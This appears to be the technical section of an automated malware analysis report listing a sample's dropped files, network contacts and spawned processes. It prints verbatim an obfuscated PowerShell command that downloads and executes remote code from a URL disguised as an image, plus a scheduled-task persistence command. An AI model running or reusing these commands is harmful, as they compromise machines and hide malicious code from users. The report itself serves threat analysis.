Technical Information
- <SYSTEM32>\tasks\update
- %WINDIR%\microsoft.net\framework\v2.0.50727\regsvcs.exe
- %TEMP%\x.exe
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- '45.##.53.124':5552
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- DNS ASK f.###4top.io
- '<SYSTEM32>\schtasks.exe' /create /sc minute /mo 200 /tn "Update" /tr "%TEMP%\x.exe"' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://f.top4top.io/p_1520fd8sw1.jpg')' (with hidden window)
- '<SYSTEM32>\schtasks.exe' /create /sc minute /mo 200 /tn "Update" /tr "%TEMP%\x.exe"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://f.top4top.io/p_1520fd8sw1.jpg')
- '%WINDIR%\microsoft.net\framework\v2.0.50727\regsvcs.exe'